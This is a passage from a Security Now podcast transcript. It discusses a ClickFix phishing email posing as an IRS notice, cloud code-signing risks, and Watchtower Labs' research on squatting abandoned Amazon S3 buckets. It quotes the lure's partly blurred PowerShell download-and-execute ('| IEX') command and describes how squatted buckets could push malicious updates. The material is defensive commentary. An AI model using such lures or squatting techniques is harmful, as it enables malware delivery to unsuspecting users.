[02:00:27] Ooh, 1099s that you didn't report. That's never good. To resolve this matter, you must appear at an IRS location. Receipt of this notice must be acknowledged using the secure method below so we can schedule your appointment. Non-acknowledgement will be deemed a failure to respond. This notice does not contain clickable links. Acknowledgement may only be made via the secure method indicated.

[02:00:57] And now we have the increasingly familiar and unfortunately increasingly successful click fix variant. It says in a separate box call out. It says acknowledgement required. Step one, hold the windows and R keys together to open run.

[02:01:19] Step two, type or paste the acknowledgement code from the box below into the open field. Step three, press enter. We will then assign your appointment. And then it provides in a four, you know, the down below acknowledgement code, which starts out reading PowerShell space quote. And then we have something that Jeffrey blurred out.

[02:01:48] Then we have forward slash IRS and then a space vertical bar space. I E X and then a close quote. So, again, as we know, this succeeds because so few people actually understand how Windows works. There are users who basically follow scripts of various forms.

[02:02:14] And this latest trend of click fix to me is truly frightening. We've learned and previously reported that more than half, I think it was 52 percent of all exploits combined are now attributable to this single category of clicks fix related social engineering attacks. More than half of all successful attacks.

[02:02:42] And even before we had this number, it was clear just looking at them that these attacks, which leverage the user's lack of true understanding of how their PCs operate, would turn out to be devastating. So, Jeffrey, thanks for sharing that. Jim Housley wrote, listening to SN 1070 from March 17th. So that's last week. You were talking about properly signed malware.

[02:03:09] And you commented about how the certificate had to be in an HSM, you know, hardware security module. He said, however, in the previous two or three weeks, when you were talking about the current options for you to get a new certificate, you mentioned that signing in the cloud was becoming an option and seemed to be preferred by the CAs.

[02:03:31] With cloud-based signing, isn't it possible to share or steal access to the cloud account to use someone else's certificate? Long time listener since episode one, Spinrite owner. Thanks, Jim. In a word, yes, you are 100 percent correct, Jim.

[02:03:51] Once code signing is moved into the cloud, then we introduce the whole new specter of remote network authentication into the code signing domain. And has there ever been any trouble with authenticating who people are over a network? Yeah.

[02:04:44] That's where mine is. And it has never suffered a break in. So I think old school physical security is a little better than allowing, you know, foreigner, foreign attackers from states we don't trust free roam and access trying to impersonate us and get our code signed. I think Jim is exactly right.

[02:05:10] And finally, Michael wrote, hey, Steve, you're not alone in your love of coding. Like you, I absolutely love writing my own code and solving problems myself. I don't care if I'm not as fast as AI as long as I am fast enough to achieve my own goals. And like you, I'm writing professional software. It's not just a hobby. And like you, I'm a one man team and my own boss. Consider this analogy.

[02:05:40] Many fishermen buy their poles and lures at Walmart, which is fine. But there exists a small subset of fishermen who make their own lures. And I'll bet you would, Micah, because you're a crafts person. I was going to say, ooh, this sounds fun. Who make their own lures because they're craftsmen who love the craft.

[02:06:07] And the experienced ones produce much better lures than the machine assembled ones available at Walmart. I suspect your code is the same. And I'd much rather buy software like Spinrite from you, which I know has had your full attention and 30 years of maturation, than ask Claude to write a cheap knockoff.

[02:06:35] Just like I'd much rather write my own software, you know, make my own lures, essentially, than cheat myself out of the joy of coding. That said, I do use Gemini to do the things I do not enjoy, like writing regular expressions. But even then, it makes mistakes that I often need to correct. Anyway, you keep on coding and know that you're not alone.

[02:07:06] Longtime listener and huge fan, Michael. And I like Michael's fishing lure analogy a lot. I think it clearly articulates the craftsmanship aspect of coding, which anyone who codes, you know, because they love it just for its own sake, would understand. So for me, AI producing code does not represent a worry or competition.

[02:07:36] You know, I've never been interested in coding in a production environment. I love that many more people than ever before are now finding themselves able to get their PCs to do things they never could before, because AI is able to create code for them, which does what they want. You know, to me, that's the greatest innovation so far on the AI coding front.

[02:08:03] And I'm sure that we, as I've said, we've only seen the tip of the iceberg. We've got lots more to come in upcoming years. Okay. And Micah, that brings us to our final break before we talk about bucket squatting. What it is, what it means, and I don't know. I don't think you want to squat over a bucket. No, no.

[02:08:28] In fact, ever since the introduction of plumbing and the toilet, I don't need a bucket anymore. Totally. Anyway, well, let me take a moment here before we continue on with the show to tell you about Club Twit at twit.tv slash club twit. That is where you can go to sign up. $10 a month, $120 a year gets you access to the club. You can also use that QR code up in the top corner there. When you join the club, you gain access to some pretty awesome benefits. You get every single one of our shows ad-free, just the content.

[02:08:58] You also gain access to our special feeds. We have feeds that you will enjoy, including our feed that has our kind of behind the scenes before the show, after the show. We have a feed that has our live coverage of tech news events. We also have a feed that has our special Club Twit shows, like what was alluded to a couple of times here, my crafting corner. We have Stacey's Book Club. We have so many good things there in the club.

[02:09:26] And if that's not enough, well, can I also invite you to join our Discord, a fun place to go to chat with your fellow Club Twit members and those of us here at Discord. Excuse me, those of us here at Twit. We would love to have you. So head to twit.tv slash club twit to check it out. Can't wait to welcome you into the fold. All right. Back from the break. I've got my bucket. My legs are ready. Tell us all about it. Okay.

[02:09:55] A little over a year ago, back in February 2025, so 13 months ago, Watchtower Labs posted a troubling narrative that documented the degree to which the security of significant parts of the Internet have not been thoroughly thought through before being implemented.

[02:10:19] And it's not only new tech like, you know, the open source repositories that bad guys are constantly attacking and poisoning or some AI that can be subverted. The greater lesson the greater lesson the past 21 years of security has taught over and over is that not only is security difficult, but we keep discovering that it's even more difficult than we thought. Or as we just recently noted, security needs to be more secure.

[02:10:49] One thing to fully appreciate is that only a portion of security failures result from bugs. Just as many failures are the result of inattention, oversight, and poor design, or what I often lump into the label of policy as opposed to mistakes.

[02:11:07] So this suggests that even after AI being used to improve our security has matured, as I'm sure it will, and it's able to help us far more strongly eliminate traditional exploitable bugs. That will not be the end of security woes, since even the misapplication of flawless technology can still result in serious consequences.

[02:11:35] So I don't see security as an issue being resolved by AI. So this brings us back to Watchtower Labs exploration from February 2025. It's a perfect teaching example of a system's poor design's unintended consequences. Watchtower's posting February before last was given the headline,

[02:12:02] 8 million requests later, we made the solar winds supply chain attack look amateur. So here's what they wrote back then. They said, surprise, surprise, we've done it again. We've demonstrated an ability to compromise significantly sensitive networks, including governments, militaries, space agencies,

[02:12:29] cybersecurity companies, supply chains, software development systems, and environments, and more. In November 2024, we decided, they wrote, to demonstrate the scenario of a significant internet-wide supply chain attack caused by abandoned infrastructure. I'll just pause to note that we've looked at problems with abandoned infrastructure before,

[02:12:57] where something has all been set up and is going. It's, for whatever reason, you know, been left behind. Pieces of it maybe have been taken away, but some pieces remain, and those end up being targets of abuse. So they said, this time, however, we dropped our obsession with expired domains, which, of course, is an example we've looked at before,

[02:13:26] and instead shifted our focus to Amazon's S3 buckets, thus bucket squatting. They said, it's important to note that although we focused on Amazon S3 for this endeavor, this research challenge, approach, and theme is cloud provider agnostic and applicable to any managed storage solution. Amazon's S3 just happened to be the first storage solution we examined,

[02:13:56] and we're certain this same challenge would apply to any customer organization usage in any storage solution provided by a cloud provider. The TLDR is that we ended up discovering around 150 Amazon S3 buckets that had been used across commercial and open source software products,

[02:14:26] governments, and infrastructure deployment and update pipelines before they were abandoned. They said, so we registered those abandoned buckets to see what would happen.

[02:14:51] The question was, how many people might be attempting to request software updates from S3 buckets that appear to have been abandoned months or even years before? Wow. At the start of this, we had no idea how this would turn out. The research panned out progressively with S3 buckets registered as they were discovered.

[02:15:19] It went rather quickly from, aha, we could put our logo on this website to .mil? We should probably speak to someone about that. Oh, my God. They said, after spending around $400, as in only $400, on S3 cloud trail and cloud watch logs querying,

[02:15:47] we had some results worth talking about. When creating these S3 buckets, we enabled logging, allowing us to track who requested files from each S3 bucket via the source IP address and what they requested, the file name, the path, and the name of the S3 bucket itself. Collectively, these S3 buckets received more than 8 million.

[02:16:15] Are you kidding me? 8 million HTTP requests over a two-month period for all sorts of things. Those making the queries for whatever it was that used to be there were requesting all sorts of things. Software updates, pre-compiled, unsigned Windows, Linux, Mac OS binaries,

[02:16:45] virtual machine images, JavaScript files, cloud formation templates, SSL VPN server configurations and credentials, and more. Had we been maliciously inclined, we could have responded to each of these 8 million requests with something malicious, like a nefarious software update,

[02:17:10] a cloud formation template that gave us access to an AWS environment, virtual machine images backdoored with remote access tooling, binaries that deployed remote access tooling, scary ransomware, or such, and so forth, to give us access to the requesting system or network that the requesting system was within, and in some cases, .mil.

[02:17:38] They wrote, these many millions of incoming give-me-this-file requests came from the networks of organizations based on DNS Whois lookups that included government networks in the USA, including NASA, numerous laboratories, state governments, etc., the UK, Poland, Australia, South Korea, Turkey, Taiwan, Chile, and more.

[02:18:06] Then there were military networks, and the networks of Fortune 500s, Fortune 100s, a payment card network, a major industrial product company, global and regional banks and financial services organizations, universities around the world, instant messenger software companies, cybersecurity technology companies, casinos, and more.

[02:18:32] We want to take this opportunity to give our sincere thanks, they wrote, to the entities who engaged with us when we realized what we'd stumbled into, including the UK's NCSC, who helped with introductions to the correct teams for us to speak to, AWS, who took those around 150 S3 buckets off our hands to sinkhole.

[02:19:01] A major unnamed SSL VPN appliance vendor, who worked with us very quickly and directly to take relevant S3 buckets off our hands. And CISA, who very quickly remediated an example that affected CISA.gov. Wow. Yeah.

[02:19:24] AWS's agreement to sinkhole the identified S3 buckets means that the release of this research does not increase the risk exposed to any party. The same issues discussed in this research could not be recreated against the same specific S3 buckets, thanks to the sinkholing performed by the AWS team.

[02:19:46] We believe that in the wrong hands, the research we performed could have led to supply chain attacks that outscaled and outimpacted anything we as an industry have seen so far. As an industry, we spend a lot of time trying to solve issues like securing the supply chain in as many complex ways as possible,

[02:20:10] while still completely failing to cover something as simple as make sure you don't take candy from strangers, unquote. Okay, so their posting then delves into the specific details about each of these many extremely embarrassing and potentially explosive exposures. To best understand how the industry got into this mess,

[02:20:36] we need to talk a bit about Amazon's somewhat astonishing AWS S3 bucket naming. First of all, a so-called bucket is nothing special. It's just Amazon's name for a cloud-based directory that can hold files.

[02:21:00] The name S3 itself, you know, stands, you know, that's three S's, right? Stands for Simple Storage Service. That's what S3 stands for, Simple Storage Service. And simple is exactly what it is. The simplicity of Amazon's Simple Storage Service likely accounts for much of its, you know, early success and popularity.

[02:21:27] But it may also have contributed to the service's very spotty security record. I mean, there have been lots of problems with exposed AWS S3 buckets in the past. What's perhaps most shocking about Amazon's S3 bucket naming is that access to any S3 storage bucket is via an HTTP URL

[02:21:54] that ends with the standard web domain S3.amazonaws.com. And surprisingly, that ending can be prefixed with anything that looks like a valid World Wide Web domain name having between three and 63 characters, because that's exactly what it is.

[02:22:23] For example, I have an Amazon bucket named GRC. That's right. The bucket's name is GRC, which means that the bucket's full name is GRC.s3.amazonaws.com. And that bucket can be accessed by anyone, anywhere in the world at any time. And if that seems like a terrifying thing, you'd be correct to think that.

[02:22:52] The only thing that even begins to make this system safe is access controls. So, of course, I have extremely strong access control security policies set on that bucket so that only I am able to work with it. But we've seen many examples where someone mistakenly, though presumably at some point for some purpose deliberately,

[02:23:21] allowed global read or read-write access to one of their S3 buckets, and disaster soon followed. That shouldn't even be an option, right? Like, why would anyone ever want... Well, read-write, I would agree, although you might want people to be able to put information up, like to submit things to you. And certainly, if you were, for example, a certain SSL VPN appliance vendor,

[02:23:51] you might want to have your appliance querying that S3 bucket by name, whatever name you've given it, to pull down updates or security configuration improvements or something. So you're basically using it like a globally accessible CDN, a content delivery network. So, actually, that's how many people use it. So, okay, as a consequence, I have a bunch of S3 buckets

[02:24:20] with many wonderful, simple, and fun names since I got there early and I grabbed them. Assignment of S3 bucket names could not be any simpler. It's as simple as first come, first serve, like Twitter handles were back in the day. If you attempted to create a bucket, which is always by name,

[02:24:45] that effort will succeed if that name is not currently assigned to anyone else's bucket. So, I have GRC, and that name is exclusively mine until I delete it. And as long as I have it, no one else can have it.

[02:25:08] In computing, we call this, this is known as a global namespace, a single shared naming space where every name must be unique. So, this means that everyone in the world shares the same naming space. There's only one Amazon S3 namespace that everyone shares to name any and all

[02:25:36] of the S3 buckets they may have created. And governed by whatever access controls its owner may have configured, any S3 bucket is accessible by its name simply by appending .s3.amazonaws.com to the end of it. For the sake of thoroughness, I'll add that S3 bucket names

[02:26:02] must be between 3 and 63 characters total. They must always be lowercase alpha from A through Z or a numeric digit, digits 0 through 9. You can also have dots and hyphens. So, just like domain names. They also must begin and end with a letter or a number, meaning they cannot begin and end with dashes,

[02:26:31] and they cannot contain a pair of adjacent dots. There must also be, I mean, there are also a bunch of specially reserved prefixes and suffixes that Amazon has, but like for things like puny code and things. So, in order to use a larger spelling alphabet.

[02:26:55] But overall, anything that anyone wishes to use will be valid within those guidelines. And notice that I keep saying that any bucket that isn't currently in use by someone, the point here, and this is where things get somewhat sticky, is that buckets that are no longer needed by their owner can be deleted. Two things occur when that happens.

[02:27:23] Whatever content they may have contained will be deleted and the bucket's name, which will then no longer be in use by its original owner, will be released and returned to the available bucket pool and become available for use by anyone who wishes to have it by name. So, now we see what these Watchtower guys did.

[02:27:51] They created some form of directed brute force Amazon S3 bucket scanner, which they used to search for named buckets that once existed, but which were then deleted by their original creators. The problem was that many widespread automated tools, software update systems,

[02:28:19] antiviral templates, virtual machine images, even executable program downloaders, continued in their attempts to access those previously, the content within those previously deleted buckets. So, when these researchers discovered and recreated one of these previously deleted buckets and began logging the failed file access attempts,

[02:28:49] they were able to quickly learn what resource something somewhere was attempting to obtain from that bucket. The danger of this is obvious and truly horrifying, given that they could see what it was that was being requested, they could readily choose to return whatever malicious content of that form they might wish.

[02:29:16] Since these requests were being made over TCP connections, the true IP address of the entities making the requests could be determined. They wrote, remember, they wrote, these many millions of incoming give me this file requests came from the networks of organizations that included, you know, government networks in the USA, NASA, laboratories, state governments, etc.

[02:29:43] The UK, Poland, Australia, South Korea, Turkey, Taiwan, Chile, and more. You know, on and on. Universities, instant messaging software companies, cybersecurity technology companies, casinos, and more. Credit card processing companies, you know, you name it. So, this is not the result, and this is the key. This is not the result of a bug. This was the result of a fundamentally poor system design.

[02:30:14] Amazon should never have allowed bucket names to be recycled and reused. And in fact, right now, they ought to take any which were ever in use and sinkhole them. Just take them offline. And really, when you think about it, bucket names are really just vanity, right? They're like license plates. Yeah, that's what I was thinking. Yeah, it doesn't matter. They're like license plates.

[02:30:43] All you really need is something random and unique that's yours. It doesn't need to be your name, your initials, or some cutesy expression. But when users are given a choice, they'll tend to create bucket names that are meaningful to them. And that likely means they could be guessed by someone else. You know, anybody could guess I might have GRC. Well, I do. So, yeah. And I'll admit it.

[02:31:12] I'd rather have GRC than 092D7630B5F. You know? Much sexier. But since S3 buckets are almost always accessed by automation, names were really never even necessary. They were just for fun. But that fun comes at a cost. Since Amazon chose to give us control over our bucket names,

[02:31:39] they should have appreciated the inherent problem with reuse and made them single use from the start. Once taken can never be used again. Okay. I have GRC. And that should be it forever. But it probably won't be. Unless they change their policy, which after all, they could at any time. My use of GRC, those three initials, will eventually end. Because I will eventually end.

[02:32:09] You know? Whether I do it deliberately or not, I'll cancel my longstanding AWS account or it'll be canceled posthumously. At that time, the account's data will be deleted. And the GRC bucket, the bucket name GRC, you know, will be recycled back into the available pool, ready to be used again by someone.

[02:32:33] I have only ever used S3 as an off-premises encrypted storage archive. The danger for me has never been present. You know? There's nothing for anybody to ask for. But the guys at Watchtower discovered that many S3 users are using once used, in other words,

[02:32:56] or I meant once used their S3 buckets as a form of CDN to deliver quite sensitive files. Both Microsoft Azure and Google Cloud have long provided protections against the inherently dangerous practice of recycling bucket names within a single global namespace, which enables this form of bucket squatting, as it's appropriately been called. But Amazon has been slow to come around.

[02:33:26] You know, change is always difficult. But the good news is, and the reason we're talking about this today, is that last Thursday, at long last, that finally changed. Amazon's announcement carried the headline, Introducing Account Regional Namespaces for Amazon S3 General Purpose Buckets. And they wrote the following. Short. It's just quick. They said,

[02:33:53] Today, we're announcing a new feature of Amazon Simple Storage Service, Amazon S3, you can use to create general purpose buckets in your own account regional namespace, simplifying bucket creation and management as your data storage needs grow in size and scope.

[02:34:19] You can create general purpose bucket names across multiple AWS regions with assurance that your desired bucket names will always be available for you to use. And that last phrase, with assurance that your desired bucket names will always be available for you to use, reminded me of another aspect of the single global namespace problem,

[02:34:46] which is that no one owns anything about any not yet created bucket names. You know, the Amazon S3 namespace is flat, as I said, not hierarchical. If I own the domain, as I do, grc.com, then I also automatically own all subdomains and host names of grc.com.

[02:35:13] www.grc.com and forums.grc.com and noodles.grc.com. They're all automatically mine. We would say that everything under grc.com is mine. But, you know, under only applies because the domain name system is an inherently hierarchical namespace.

[02:35:39] There's no under in any flat namespace such as S3 has always used. So, for example, you know, that say that an organization had the practice of saving their annual archives into a series of buckets named Acme Enterprises Archive 2024.

[02:36:01] Then the next year, Acme Enterprises Archive 2025 and so on, where the year obviously is incremented successively. If some begrudging ex-ex-employee, you know where we're going, wished to cause their ex-employer Acme Enterprises some grief,

[02:36:25] nothing prevents them, the ex-employee, from opening an Amazon S3 account, which has cost nothing, and creating the bucket Acme Enterprises Archive 2026. Now, at the end of this year, when Acme Enterprises went to create their succeeding year's archive bucket, that attempt would fail because someone else had beaten them to it.

[02:36:52] Having a single global namespace shared by every S3 user may have once seemed simple and maybe even fun, but there's a better way. So, Amazon's edition of what they're now calling account regional namespaces is a long-needed edition. Their announcement continues to explain this, writing,

[02:37:13] With this feature, you can predictably name and create general-purpose buckets in your own account regional namespace by appending your account's unique suffix in your registered bucket name. For example, the bucket named OurBucket-123456789012-US-East-1-AN.

[02:37:43] Okay, not particularly sexy, but okay. That would exist in an account regional namespace. They said OurBucket is the bucket name prefix specified. Then we add the account regional suffix to the requested bucket name, which is that hyphen 123456789012-US-East-1-AN.

[02:38:10] If another account tries to create buckets using this account suffix, and Lord, why would they? Their requests will be automatically rejected. So, that's the good news. You get protection against somebody trying to create a bucket with your specific account number suffix. They finish saying your security teams can use AWS identity and access management policies

[02:38:40] and AWS organization's service control policies to enforce that your employees are only able to create buckets in their account regional namespace. This will help teams adopt the account regional namespace across your organization. Okay, so I would argue that the implementation of this is something of a kluge.

[02:39:07] The total length of the bucket name prefix plus the regional account suffix is 63 characters. So, they've really only done two things. First, any bucket created while this new policy is enabled must end in the proper account number regional suffix.

[02:39:33] Second, that account number regional suffix is now reserved for employees using that account number. So, no one else can create a bucket which uses that suffix. And I guess a third thing they've done is they've allowed you to set policies.

[02:39:53] They've, you know, upper management, the IT overlords can set policies that require all new buckets created to use this account regional namespace suffix. So, they finally address this problem. Notice that it is incumbent on the organization to turn this on. Right. This doesn't do anything retrospectively, retroactively.

[02:40:23] All of that is still a problem. That is, non-regional suffix buckets presumably still exist and work, but only newly ones created. So, this is just enforcing a new bucket creation policy, bucket creation naming policy on future bucket creation. So, unless Amazon also decides to prohibit the recycling of previous bucket names and they ought to just take,

[02:40:53] they ought to immediately, you know, blacklist any that have been abandoned right now, they're still doing nothing to prevent bucket squatting on earlier buckets, which these guys may not have found. They had to do some sort of brute force scanning to find all of these buckets. There are probably other buckets that still exist that have not been found.

[02:41:19] So, you know, the good news is if organizations adopt and enable this enforcement account number regional suffix bucket naming, then at least going forward, the problem will have been prevented. And that is bucket squatting. That is far more terrifying than I thought it was going to be based on the name. I will say that. That's pretty prevalent across the web.

[02:41:48] And the fact that they- It's frightening how widespread this is. There's a level of creativity among security researchers that I really find to be quite incredible. When sometimes you'll be talking about these different exploits and ideas, and I think about the thinking required to get to that end point, right?

[02:42:13] And it's, you know, despite being on its face a more practical, more sort of scientific approach, there's a lot of creativity that's involved in the work that you all do. And I think that that's something that really stands out to me at these times because I just, yeah, you have to think about the different tools that we use that are out there, and then go, as you like to say, what could possibly go wrong?

[02:42:43] And that list can be hundreds of thousands of things. And you just highlight the one. Oh yeah, let's check this. Let's see if that works. This is just a cool thing to think of, but it's a terrifying outcome. Whatever it comes down to be true, right? Yeah. Yeah. We're still just, on one hand, I think we're dragging legacy design and policy forward.

[02:43:10] And it's also the case that, I mean, because AWS was created once after the internet was mature. We already, I mean, as a cloud-based service, yet these guys didn't stop to think, well, what if somebody uses automated agents to pull code from buckets and like firewalls or SSL VPN

[02:43:35] appliances that they're checking for new firmware, and then they go out of business or they decide, we don't like this bucket, we're going to move that in-house. But there's all this equipment out there that is still pulling from a bucket, which has been abandoned, but some bad guy could then register and provide their own download for all this equipment to download. I mean, this is a real problem. Yeah.

[02:44:04] They actually proved it to be a real problem. Yes. Yeah. And that's terrifying. I'm glad that it's, you know, again, we're shining a light on it. That's the first step. And it's the good guys who are finding it and not the bad guys, because it could be exploited. Unfortunately, there appear to be no lack of problems that the bad guys are finding and exploiting too. There are always so many things on that list that we talked about earlier.

[02:44:31] So, Steve, I'm glad that you have your eye on the prize and that others out there are paying attention as well. Well, this has been Security Now. The show publishes every Tuesday. Twit.tv slash SN is where you go to find the show. Heading there gives you access to the audio and video versions of the show.

[02:44:55] You can, of course, check out grc.com where you will find all sorts of good things. It's also where you can go to make sure that you are part of the email subscriptions and to send Steve email as well. And, of course, it's the place where you can go to get Spinrite, Steve's bread and butter, plus the DNS benchmark. That's available now, right?

[02:45:25] Yeah. Yeah. It has been for months. Yep. The DNS benchmark is now available. Wonderful. Wonderful. Steve, thank you so much for another great episode. If I'm forgetting anything, now's your time to tell us. You got it. You got it. Wonderful. Wonderful. Thanks for doing a great job at your end. Thank you. Yeah. It's always a pleasure to get to join you on the show. Leo will be back next week, everyone. Don't worry. But thank you for having me. He does have some travel planned for later this year.

[02:45:55] So we're going to be seeing more of you. Yes, indeed. And I'll be right here ready for it. All right. I think that does it for this week. So goodbye, Steve. And goodbye, listeners. Goodbye. Thanks, buddy. Bye. Thank you very much. Hey, I'm Micah Sargent, host of Tech News Weekly and several other shows on the network. If you're looking for a smarter way to advertise in 2026, look no further.

[02:46:21] Because Twit is where tech decision makers listen and ROI never ends. Our audience isn't just passionate about technology either. They actually work in it. Over 90% of our listeners are IT professionals, developers, engineers, and business leaders who shape the products and the decisions that move tech forward at their companies. Here at Twit, we produce an array of trusted tech shows.

[02:46:46] These include the latest news and hands-on advice featuring authentic, embedded, host-read ads delivered by Leo Laporte and yours truly. Now, our partners see real results because our listeners actually trust us and then take action. And that's because of authenticity. When I'm talking about how I like a product or a service, it's because I actually do. And our listeners know that. And here's something we're super proud of.

[02:47:12] 88% of our listeners say they've made a purchase because of a Twit ad. So if you're ready to reach the most intelligent audience in tech with that purchasing power to back it up, let's talk. We'd love to help your brand grow. Email partner at twit.tv or visit twit.tv slash advertise. Security.

Security Now, Intoxalock,Leo Laporte, H&R Block tax software vulnerability, breathalyzer cyberattack, root certificate authority,TWiT,steve gibson, WKATX Server Host 2024, private key exposure, browser trusted root store, man-in-the-middle attacks,